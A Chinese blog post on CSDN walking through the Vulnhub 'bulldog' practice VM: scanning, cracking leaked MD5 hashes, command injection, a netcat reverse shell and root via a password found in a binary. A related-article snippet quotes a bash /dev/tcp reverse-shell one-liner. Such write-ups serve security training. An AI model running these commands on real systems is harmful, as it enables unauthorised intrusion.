渗透测试-vulnhub靶机 bulldog

最新推荐文章于 2024-07-01 09:02:43 发布
最新推荐文章于 2024-07-01 09:02:43 发布
阅读量57 收藏 1
点赞数
文章标签: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2301_79441074/article/details/134583912
版权

信息收集

namp 半开扫描

访问80端口

敏感目录扫描

访问敏感目录 admin

访问敏感目录 dev

访问dev/shell 

在 dev 控制台发现MD5编码,且有用户名

md5解密,只有最后两个能解密出来

尝试以 nick、sarah 作为用户名,将 bulldog、bulldoglover 作为密码登录,登陆成功

登陆成功后访问 /dev/shell/,页面发生变化

发现可以使用上述命令

getshell

kali 开启nc监听

网站输入反弹shell

链接成功

提权

查看用户信息

进入/home/bulldogadmin/.hiddenadmindirectory目录下发现

打开后是乱码

使用strings(解决二进制文件乱码)命令打开,发现密码 : SUPERultimatePASSWORDyouCANTget

 用 Python 调用本地的 shell 实现

python -c 'import pty; pty.spawn("/bin/bash")'

切换root输入刚才找到的密码

HSY233233
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
vulnhub】---bulldog靶机
qq_43168364的博客
08-21 359
目录 一、实验环境 二、信息收集 三、渗透测试   1、漏洞发现和利用   2、提权 四、总结 一、实验环境 靶机:bolldog靶机(192.168.1.105) 攻击机:kali Linux(192.168.1.104) 二、信息收集 主机发现 或者用netdiscover也可以。命令:netdiscover -i eth0 -r 192.168.1.0/24 端口扫描,首先用masscan看看它开启了哪些端口,他的速度过快时貌似发现不了某些端口,可以多扫描几次。 使用nmap进行版本探测
Vulnhub-Bulldog2 靶机渗透
Majula
02-04 344
WalkthroughDownloadDescriptionPen TestingScanningExploitationSolution ISolution IIPrivilege EscalationReview Download BULLDOG: 2 - VlunHub 靶机详细配置参考 Vulnhub-Bulldog1 靶机渗透 这篇文章,此篇不再赘述。 同样,启动靶机显示 IP 才算配置成功。 Description This is a Standard Boot-to-Root. Your
渗透测试靶机渗透Vulnhub-bulldog
SunnyCat
06-01 2872
目录前言一、bulldog靶机安装二、bulldog靶机渗透1、信息搜集2、Web渗透--后台登录3、Web渗透--命令注入&nc反弹shell4、权限提升渗透步骤回顾感悟 前言 bulldog靶机的渗透有很多的前辈都做了教程,我这篇也是参考了许多前辈的博客,但是中间还是有很多不懂得地方,官方说有两条路可以拿到root,我只找到了一条。以下内容均是我作为一个菜鸡实操之后的所得,为了留个印子记下来。 参考博客: https://blog.csdn.net/Eastmount/article/detai
渗透靶机BULLDOG
qq_43235703的博客
02-02 1152
靶机渗透之BULLDOG 渗透环境: 攻击机:kali(10.0.10.198) 靶机:vmbox(10.0.10.208) 连接模式:全部为桥接 探嗅目标 安装好我们的靶机之后开机,然后你的ip地址就出现在靶机界面上面,也省了我们用kali来扫 但是多少这达不到我们模拟实战的过程,真正的渗透谁会把地址摆着给你啊对不对,所以还是要动手用netdiscover来扫一波,直接扫出来然后上nmap扫端...
Vulnhub靶场渗透测试 bulldog-1 非预期CVE-2017-16995,CVE-2021-4034
最新发布
qq_29060627的博客
07-01 156
靶机地址:https://www.vulnhub.com/entry/bulldog-1%2C211/脏牛提权失败(在2016年公布的漏洞,ubuntu16.04 可能补上了 )Vulnhub靶场渗透测试系列bulldog(命令注入和sudo提权)
靶机渗透【bulldog
学信安技术 卫国家之门
11-04 4562
一. bulldog靶机安装 1. 下载bulldog 靶场地址:Bulldog - VulnHub (可自行下载) 百度网盘:bulldog 提取码:qrnf 2. 将下载好的靶机存放在想存放的地方,建议放在其他虚拟机相同的目录下 3. 打开VMware,左上角文件 - - 打开 - - 找到存放bulldog的位置 4. 开启bulldog(开启后无需进行其他操作) 二. bulldog靶机渗透 设备信息: kali(NAT)IP:192.168.110.140 bulldog(NAT)IP:
bulldog靶机
ybkj6666的博客
11-04 234
使用arp-scan生成网络接口地址,查看ip。
Bulldog靶机 学习总结 网络安全
Shelby12345的博客
01-31 929
发现了自己django,然后注意到有个id是bulldogadmin的很可疑,再系统中查找一下bulldogadmin所属的文件find / -user bulldogadmin 2>/dev/null(输入SUPERultimatePASSWORDyouCANTget,密码错误,又去找了找前辈的答案,发现H都是多余的,SUPERultimatePASSWORDyouCANTget。直接访问http://192.168.144.137/admin/ 发现需要登陆,F12看一下很干净,没藏东西。
vulnhub靶机bulldog渗透笔记
liver100day的博客
05-18 274
bulldog靶机渗透笔记 靶机环境搭建 攻击渗透机:kali IP地址:192.168.75.128 靶机bulldog ip地址:未知 靶机下载链接:https://download.vulnhub.com/bulldog/bulldog.ova 在这里就不介绍虚拟机的安装方式了,但是要记得把攻击机和靶机的网络连接方式都改为桥接模式 渗透过程 1.信息收集 netdiscover 来确认目标靶机IP地址,会扫描出同网段中除本机外的其他存活主机 ...
Vulnhub-Bulldog1 靶机渗透
Majula
02-01 582
WalkthroughDownloadDescriptionPen TestingScanningExploitationPrivilege EscalationSolution ISolution IIReview Download BULLDOG: 1 - VlunHub VM 镜像文件。 这里 VM 我导入配置失败,分配不了 IP,建议用 VirtualBox,因为靶机默认模式是桥接,攻击机也要设为桥接模式。 我是 VM 运行 Kali,VirtualBox 运行靶机,如果你是这种情况,为了更加直观,
vulnhub】---DC-4靶机
qq_43168364的博客
08-21 1950
目录 一、实验环境 二、信息收集 三、渗透测试   1、漏洞发现和利用   2、提权 四、总结 一、实验环境 靶机:DC-4靶机(192.168.15.152) 攻击机:kali Linux(192.168.15.129) 二、信息收集 主机发现 端口扫描 版本探测和操作系统识别 web指纹识别 网站目录扫描 三、渗透测试 1、漏洞发现和利用 2、提权 四、总结 渗透步骤 渗透思路 ......
bulldog1靶场渗透
b1n的博客
08-26 172
echo 'bash -i >& /dev/tcp/192.168.22.135/1234 0>&1' | bash #中间的ip是主机kali的地址,监听端口设置的啥就写啥。4、然后再去访问http://192.168.22.139/admin,用刚才的猜想用邮箱前的疑似用户名加上后面解密出的当做用户名和密码进行登录。5、再去访问http://192.168.22.139/dev/shell,发现可以成功访问,列出来的命令都可以执行。
Vulnhub-Bulldog靶机实战
御七彩虹猫
03-24 1440
Vulnhub-Bulldog靶机实战
学习渗透日记4 靶机bulldog实战
qq_56902810的博客
04-26 214
bulldog靶机完整渗透版!
靶机实战-bulldog1
滕财然的博客
01-19 1032
bulldog1-靶机实战靶机实战:bulldog11、主机发现2、扫描端口3、web渗透(80端口)4、提权 靶机实战:bulldog1 先要知道对方的IP是否存活,也就是主机发现 1、主机发现 netdiscover -i etho -r IP/网段 属于主动 -i 指定网卡 -r 指定网段 找到目标靶机IP:192.168.232.134 也可以用nmap -sn 扫,看自己心情。...
bulldog靶机复现
2301_79118231的博客
11-14 212
注:个人笔记,有点简陋,仅供参考。准备:把kali和靶机设置为同一网段(NAT)
vuInhub靶场实战系列--bulldog-1
weixin_45221204的博客
06-03 1256
Vulnhub是一个提供各种漏洞环境的靶场平台,大部分环境是做好的虚拟机镜像文件,镜像预先设计了多种漏洞。本文介绍bulldog-1靶机渗透测试,内容包括主机扫描(nmap\netdiscover)、端口扫描(nmap\masscan)、目录扫描(dirb\dirsearch)MD5在线解码、netcat、反弹shell、linux内核提权等内容。😃使用nmap进行主机发现和端口扫描使用dirbsearch进行目录扫描MD5解密netcat监听反弹shell。
[渗透测试靶机10] vulnhub靶场 BULLDOG_ 1
weixin_47112073的博客
11-13 332
这个靶机难度较为简单,可以简单练手
bulldog靶机练习思路详解
weixin_45597678的博客
07-09 313
下载靶机,在虚拟机中打开 下载地址:https://download.vulnhub.com/bulldog/bulldog.ova 主机扫描nmap,发现目标主机与其开放的端口 在浏览器打开网站,只发现一只傻不拉几的狗狗 使用burp进行爬虫发现网站下存在一个robots.txt 进行访问没有任何有用的信息 对网站进行目录扫描发现存在admin 浏览admin网页,打开了一个登录页面,但是没用做不了爆破 进入dev目录进行代码审计查看代码上是否用可用信息 发现一些加密之后的密码进行解码之后在
渗透DC-1靶机设计思路
05-24
1. 确定目标:首先需要确定渗透的目标,即DC-1靶机。 2. 收集信息:收集关于DC-1的信息,如IP地址、开放端口、操作系统等。可以使用工具如nmap、whois、dnsrecon等进行信息搜集。 3. 扫描漏洞:使用漏洞扫描工具如...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值